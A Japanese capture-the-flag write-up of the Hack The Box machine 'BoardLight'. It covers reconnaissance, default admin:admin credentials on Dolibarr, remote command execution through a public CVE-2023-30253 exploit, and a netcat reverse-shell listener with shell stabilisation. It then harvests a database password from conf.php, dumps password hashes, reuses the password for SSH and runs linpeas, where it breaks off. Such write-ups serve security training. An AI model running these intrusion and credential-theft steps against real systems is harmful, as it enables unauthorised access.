初めに
本記事は Hack The Box(以下リンク参照) の「BoardLight」にチャレンジした際の WriteUp になります。
※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
初期探索
ポートスキャン
┌──(root㉿kali)-[~/work]
└─# rustscan -a 10.129.162.57 --top
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.162.57:22
Open 10.129.162.57:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 07:52 EDT
Initiating Ping Scan at 07:52
Scanning 10.129.162.57 [4 ports]
Completed Ping Scan at 07:52, 0.35s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:52
Completed Parallel DNS resolution of 1 host. at 07:52, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 07:52
Scanning 10.129.162.57 [2 ports]
Discovered open port 22/tcp on 10.129.162.57
Discovered open port 80/tcp on 10.129.162.57
Completed SYN Stealth Scan at 07:52, 0.33s elapsed (2 total ports)
Nmap scan report for 10.129.162.57
Host is up, received reset ttl 63 (0.29s latency).
Scanned at 2024-05-27 07:52:36 EDT for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (128B)
22と80番Portが公開されている。
80番にアクセスすると以下のサイトが見える。
サイト探索
whatweb
とりあえず回します。
┌──(root㉿kali)-[~/work]
└─# whatweb -v http://10.129.162.57/
WhatWeb report for http://10.129.162.57/
Status : 200 OK
Title : <None>
IP : 10.129.162.57
Country : RESERVED, ZZ
Summary : Apache[2.4.41], Bootstrap, Email[info@board.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], JQuery[3.4.1], Script[text/javascript], X-UA-Compatible[IE=edge]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.41 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : https://getbootstrap.com/
[ Email ]
Extract email addresses. Find valid email address and
syntactically invalid email addresses from mailto: link
tags. We match syntactically invalid links containing
mailto: to catch anti-spam email addresses, eg. bob at
gmail.com. This uses the simplified email regular
expression from
http://www.regular-expressions.info/email.html for valid
email address matching.
String : info@board.htb
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.41 (Ubuntu) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Version : 3.4.1
Website : http://jquery.com/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
String : text/javascript
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
HTTP Headers:
HTTP/1.1 200 OK
Date: Mon, 27 May 2024 11:58:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2991
Connection: close
Content-Type: text/html; charset=UTF-8
mail情報が見えるので、以下のように/etc/hostsに登録します。
10.129.162.57 board.htb
サブドメイン探索
ffufを使って探索します。
┌──(root㉿kali)-[~/work]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -u http://board.htb/ -H "Host: FUZZ.board.htb" -mc all -fs 15949 -t 150
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://board.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: all
:: Filter : Response size: 15949
________________________________________________
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 1390ms]
* [Status: 400, Size: 301, Words: 26, Lines: 11, Duration: 422ms]
:: Progress: [100000/100000] :: Job [1/1] :: 465 req/sec :: Duration: [0:04:56] :: Errors: 0 ::
見つけたので、これも/etc/hostsに登録します。
10.129.162.57 board.htb crm.board.htb
大体こういうのはサブドメインのほうに脆弱性やら情報があるので、こっちを探索します。
ディレクトリ探索
┌──(root㉿kali)-[~/work]
└─# dirsearch -u http://crm.board.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/work/reports/http_crm.board.htb/__24-05-27_08-02-04.txt
Target: http://crm.board.htb/
[08:02:04] Starting:
[08:02:15] 403 - 278B - /.ht_wsr.txt
[08:02:15] 403 - 278B - /.htaccess.bak1
[08:02:15] 403 - 278B - /.htaccess.sample
[08:02:15] 403 - 278B - /.htaccess.orig
[08:02:15] 403 - 278B - /.htaccess.save
[08:02:15] 403 - 278B - /.htaccess_sc
[08:02:15] 403 - 278B - /.htaccess_extra
[08:02:15] 403 - 278B - /.htaccess_orig
[08:02:15] 403 - 278B - /.htaccessBAK
[08:02:15] 403 - 278B - /.htaccessOLD
[08:02:15] 403 - 278B - /.htaccessOLD2
[08:02:15] 403 - 278B - /.htm
[08:02:15] 403 - 278B - /.html
[08:02:15] 403 - 278B - /.htpasswd_test
[08:02:15] 403 - 278B - /.htpasswds
[08:02:15] 403 - 278B - /.httr-oauth
[08:02:19] 403 - 278B - /.php
[08:02:34] 301 - 314B - /admin -> http://crm.board.htb/admin/
[08:02:52] 301 - 312B - /api -> http://crm.board.htb/api/
[08:02:53] 200 - 108B - /api/
[08:02:55] 403 - 278B - /asterisk/
[08:03:06] 301 - 319B - /categories -> http://crm.board.htb/categories/
[08:03:10] 404 - 16B - /composer.phar
[08:03:10] 403 - 278B - /conf
[08:03:10] 403 - 278B - /conf/
[08:03:10] 403 - 278B - /conf/Catalina
[08:03:10] 403 - 278B - /conf/catalina.policy
[08:03:10] 403 - 278B - /conf/catalina.properties
[08:03:10] 403 - 278B - /conf/context.xml
[08:03:10] 403 - 278B - /conf/logging.properties
[08:03:10] 403 - 278B - /conf/server.xml
[08:03:10] 403 - 278B - /conf/web.xml
[08:03:10] 403 - 278B - /conf/tomcat-users.xml
[08:03:10] 403 - 278B - /conf/tomcat8.conf
[08:03:12] 301 - 316B - /contact -> http://crm.board.htb/contact/
[08:03:13] 301 - 313B - /core -> http://crm.board.htb/core/
[08:03:14] 301 - 313B - /cron -> http://crm.board.htb/cron/
[08:03:14] 403 - 278B - /cron/
[08:03:14] 403 - 278B - /custom/
[08:03:23] 200 - 2KB - /favicon.ico
[08:03:25] 301 - 312B - /ftp -> http://crm.board.htb/ftp/
[08:03:31] 301 - 317B - /includes -> http://crm.board.htb/includes/
[08:03:31] 403 - 278B - /includes/
[08:03:32] 301 - 316B - /install -> http://crm.board.htb/install/
[08:03:32] 200 - 322B - /install/
[08:03:32] 200 - 322B - /install/index.php?upgrade/
[08:03:52] 404 - 16B - /php-cs-fixer.phar
[08:03:53] 403 - 278B - /php5.fcgi
[08:03:56] 404 - 16B - /phpunit.phar
[08:03:59] 301 - 316B - /product -> http://crm.board.htb/product/
[08:03:59] 301 - 315B - /public -> http://crm.board.htb/public/
[08:04:00] 302 - 0B - /public/ -> /public/error-404.php
[08:04:02] 301 - 317B - /resource -> http://crm.board.htb/resource/
[08:04:03] 200 - 105B - /robots.txt
[08:04:05] 200 - 176B - /security.txt
[08:04:05] 403 - 278B - /server-status/
[08:04:05] 403 - 278B - /server-status
[08:04:12] 301 - 316B - /support -> http://crm.board.htb/support/
[08:04:13] 200 - 1KB - /support/
[08:04:16] 301 - 314B - /theme -> http://crm.board.htb/theme/
[08:04:20] 301 - 313B - /user -> http://crm.board.htb/user/
[08:04:20] 403 - 278B - /user/
[08:04:20] 301 - 319B - /user/admin -> http://crm.board.htb/user/admin/
[08:04:26] 301 - 316B - /website -> http://crm.board.htb/website/
Task Completed
色々と見えますね。
ブラウジング
サブドメインのほうにアクセスしていきます。
Dolibarr 17.0.0の情報が見えます。このソフトの脆弱性かな?
とりあえずadmin:adminでログインしてみます。
いけました。
イニシャルアクセス
CVE-2023-30253
上記バージョンの脆弱性情報を探っていると、以下のリポジトリがヒットします。
このExploitコードの環境を構築します。
┌──(root㉿kali)-[~/work]
└─# git clone https://github.com/Rubikcuv5/cve-2023-30253.git
┌──(root㉿kali)-[~/work]
└─# cd cve-2023-30253
┌──(root㉿kali)-[~/work/cve-2023-30253]
└─# python -m venv venv
┌──(root㉿kali)-[~/work/cve-2023-30253]
└─# source ./venv/bin/activate
┌──(venv)─(root㉿kali)-[~/work/cve-2023-30253]
└─# pip install -r requirements.txt
ここら辺の手順で環境が出来ると思います。
実際にコマンドを試してみます。
┌──(venv)─(root㉿kali)-[~/work/cve-2023-30253]
└─# python CVE-2023-30253.py --url http://crm.board.htb/ -u admin -p admin -c whoami
___ ___ ___
/\ \ /\__\ /\ \
/::\ \ /:/ / /::\ \
/:/\:\ \ /:/ / /:/\:\ \
/:/ \:\ \ /:/__/ ___ /::\~\:\ \
/:/__/ \:\__\ |:| | /\__\ /:/\:\ \:\__\
\:\ \ \/__/ |:| |/:/ / \:\~\:\ \/__/
\:\ \ |:|__/:/ / \:\ \:\__\
\:\ \ \::::/__/ \:\ \/__/
\:\__\ ~~~~ \:\__\
\/__/ \/__/
___ __ ___ ____ ____ __ ___ ___ ____
|_ ) \_ )__ /__|__ // \_ ) __|__ /
/ / () / / |_ \___|_ \ () / /|__ \|_ \
/___\__/___|___/ |___/\__/___|___/___/
[+] By Rubikcuv5.
[*] Url: http://crm.board.htb/
[*] User: admin
[*] Password: admin
[*] Command: whoami
[*] Verifying accessibility of URL:http://crm.board.htb//admin/index.php
[*] Attempting login to http://crm.board.htb//admin/index.php as admin
[+] Login successfully!
[*] Creating web site ...
[+] Web site was create successfully!
[*] Creating web page ...
[+] Web page was create successfully!
[*] Executing command whoami
[+] Command execution successful :
www-data
[+] Information retrieved successfully!
上手くRCE出来ました。
Revshell
いつものこのサイトを利用します。
busyboxで刺さりました。
interactive shell
Tab補完など利用できるように、シェルを安定させます。
┌──(root㉿kali)-[~/work]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.102] from (UNKNOWN) [10.129.162.57] 57028
whoami
www-data
python3 -c 'import pty; pty.spawn("bash")'
www-data@boardlight:~/html/crm.board.htb/htdocs/website$
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ ^Z
zsh: suspended nc -lvnp 4444
┌──(root㉿kali)-[~/work]
└─# stty raw -echo; fg
[1] + continued nc -lvnp 4444
export TERM=xterm
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ export SHELL=/bin/bash
www-data@boardlight:~/html/crm.board.htb/htdocs/website$ reset
クレデンシャルアクセス
この権限ではUserフラグを取れないので情報を列挙します。
conf階層があったので.envなどがないか探しに行きます。
そうすると、以下のファイルconf.phpを発見したので見てみます。
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';
//$dolibarr_main_demo='autologin,autopass';
// Security settings
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_main_restrict_os_commands='mysqldump, mysql, pg_dump, pgrestore';
$dolibarr_nocsrfcheck='0';
$dolibarr_main_instance_unique_id='ef9a8f59524328e3c36894a9ff0562b5';
$dolibarr_mailing_limit_sendbyweb='0';
$dolibarr_mailing_limit_sendbycli='0';
//$dolibarr_lib_FPDF_PATH='';
//$dolibarr_lib_TCPDF_PATH='';
//$dolibarr_lib_FPDI_PATH='';
//$dolibarr_lib_TCPDI_PATH='';
//$dolibarr_lib_GEOIP_PATH='';
//$dolibarr_lib_NUSOAP_PATH='';
//$dolibarr_lib_ODTPHP_PATH='';
//$dolibarr_lib_ODTPHP_PATHTOPCLZIP='';
//$dolibarr_js_CKEDITOR='';
//$dolibarr_js_JQUERY='';
//$dolibarr_js_JQUERY_UI='';
//$dolibarr_font_DOL_DEFAULT_TTF='';
//$dolibarr_font_DOL_DEFAULT_TTF_BOLD='';
$dolibarr_main_distrib='standard';
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$
mysqlのクレデンシャルなのでこのクレデンシャルを利用してみます。
マシンにコマンドがあるかどうか確認します。
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ mysql --version
mysql Ver 8.0.36-0ubuntu0.20.04.1 for Linux on x86_64 ((Ubuntu))
あるようなのでこれでDBを探ってみます。
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ mysql -h 127.0.0.1 -u dolibarrowner -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 237
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2024, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| dolibarr |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.01 sec)
mysql> use dolibarr;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
show tables;で確認するとllx_userがいたので中身を確認します。
mysql> select * from llx_user;
+-------+--------+--------------+---------+-------+----------+------------------+---------------------+---------------------+---------------+---------------+----------+---------------+------+--------------------------------------------------------------+-----------+--------------+--------+----------+------------+-----------+---------+------+------+----------+------------+-------+-------------+------+--------------+------------+-------------+-----------------+-------+----------------+-----------+----------------+--------+--------------+-----------+---------+---------------------------+---------------------------+---------+---------+---------+-------------+--------------+-----------+---------------------+---------------------+------------------------+-------------------+-----------------+--------------+-----------------+---------------+----------+--------+--------+-------+------+-------+---------+-----------------+------------------+------------+------+------+--------+-------------+----------------+-------------------+-------------+------------+---------------+-----------------------+------------------------------+--------------+
| rowid | entity | ref_employee | ref_ext | admin | employee | fk_establishment | datec | tms | fk_user_creat | fk_user_modif | login | pass_encoding | pass | pass_crypted | pass_temp | api_key | gender | civility | lastname | firstname | address | zip | town | fk_state | fk_country | birth | birth_place | job | office_phone | office_fax | user_mobile | personal_mobile | email | personal_email | signature | socialnetworks | fk_soc | fk_socpeople | fk_member | fk_user | fk_user_expense_validator | fk_user_holiday_validator | idpers1 | idpers2 | idpers3 | note_public | note_private | model_pdf | datelastlogin | datepreviouslogin | datelastpassvalidation | datestartvalidity | dateendvalidity | iplastlogin | ippreviouslogin | egroupware_id | ldap_sid | openid | statut | photo | lang | color | barcode | fk_barcode_type | accountancy_code | nb_holiday | thm | tjm | salary | salaryextra | dateemployment | dateemploymentend | weeklyhours | import_key | default_range | default_c_exp_tax_cat | national_registration_number | fk_warehouse |
+-------+--------+--------------+---------+-------+----------+------------------+---------------------+---------------------+---------------+---------------+----------+---------------+------+--------------------------------------------------------------+-----------+--------------+--------+----------+------------+-----------+---------+------+------+----------+------------+-------+-------------+------+--------------+------------+-------------+-----------------+-------+----------------+-----------+----------------+--------+--------------+-----------+---------+---------------------------+---------------------------+---------+---------+---------+-------------+--------------+-----------+---------------------+---------------------+------------------------+-------------------+-----------------+--------------+-----------------+---------------+----------+--------+--------+-------+------+-------+---------+-----------------+------------------+------------+------+------+--------+-------------+----------------+-------------------+-------------+------------+---------------+-----------------------+------------------------------+--------------+
| 1 | 0 | | NULL | 1 | 1 | 0 | 2024-05-13 13:21:56 | 2024-05-13 13:21:56 | NULL | NULL | dolibarr | NULL | NULL | $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm | NULL | NULL | | | SuperAdmin | | | | | NULL | NULL | NULL | NULL | | | | | | | | | null | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | | NULL | 2024-05-15 09:57:04 | 2024-05-13 23:23:59 | NULL | NULL | NULL | 10.10.14.31 | 10.10.14.41 | NULL | | NULL | 1 | NULL | NULL | | NULL | 0 | | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | NULL |
| 2 | 1 | | NULL | 0 | 1 | 0 | 2024-05-13 13:24:01 | 2024-05-15 09:58:40 | NULL | NULL | admin | NULL | NULL | $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 | NULL | yr6V3pXd9QEI | NULL | | admin | | | | | NULL | NULL | NULL | NULL | | | | | | | | | [] | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | | NULL | 2024-05-27 05:17:38 | 2024-05-27 05:17:14 | NULL | NULL | NULL | 10.10.14.102 | 10.10.14.102 | NULL | | NULL | 1 | NULL | NULL | | NULL | 0 | | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | | NULL |
+-------+--------+--------------+---------+-------+----------+------------------+---------------------+---------------------+---------------+---------------+----------+---------------+------+--------------------------------------------------------------+-----------+--------------+--------+----------+------------+-----------+---------+------+------+----------+------------+-------+-------------+------+--------------+------------+-------------+-----------------+-------+----------------+-----------+----------------+--------+--------------+-----------+---------+---------------------------+---------------------------+---------+---------+---------+-------------+--------------+-----------+---------------------+---------------------+------------------------+-------------------+-----------------+--------------+-----------------+---------------+----------+--------+--------+-------+------+-------+---------+-----------------+------------------+------------+------+------+--------+-------------+----------------+-------------------+-------------+------------+---------------+-----------------------+------------------------------+--------------+
2 rows in set (0.00 sec)
これでパスワードハッシュが手に入ったのですが、Johnでは解読できませんでした。
単純にUserのPassにmysqlのパスワードが使いまわされていることを考えて、Userを確認してみます。
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false
sssd:x:126:131:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:127:134:MySQL Server,,,:/nonexistent:/bin/false
fwupd-refresh:x:128:135:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
sshd:x:129:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$
larissaさんがhome階層持ってそうなのでSSHでアクセスしてみます。
いけました!これでUserフラグゲットです。
権限昇格
情報列挙
linpeas
おなじみのPEAS回します。
larissa@boardlight:/tmp$ ./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by github.com/PEASS-ng
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
...省略
╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr 8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)
-rwsr-xr-- 1 root messagebus 51K Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 467K Jan 2 09:13 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root dip 386K Jul 23 2020 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 44K Feb 6 04:49 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 55K Apr 9 08:34 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 163K Apr 4 2023 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 67K Apr 9 08:34 /usr/bin/su
-rwsr-xr-x 1 root root 84K Feb 6 04:49 /usr/bin/chfn ---> SuSE_9.3/10
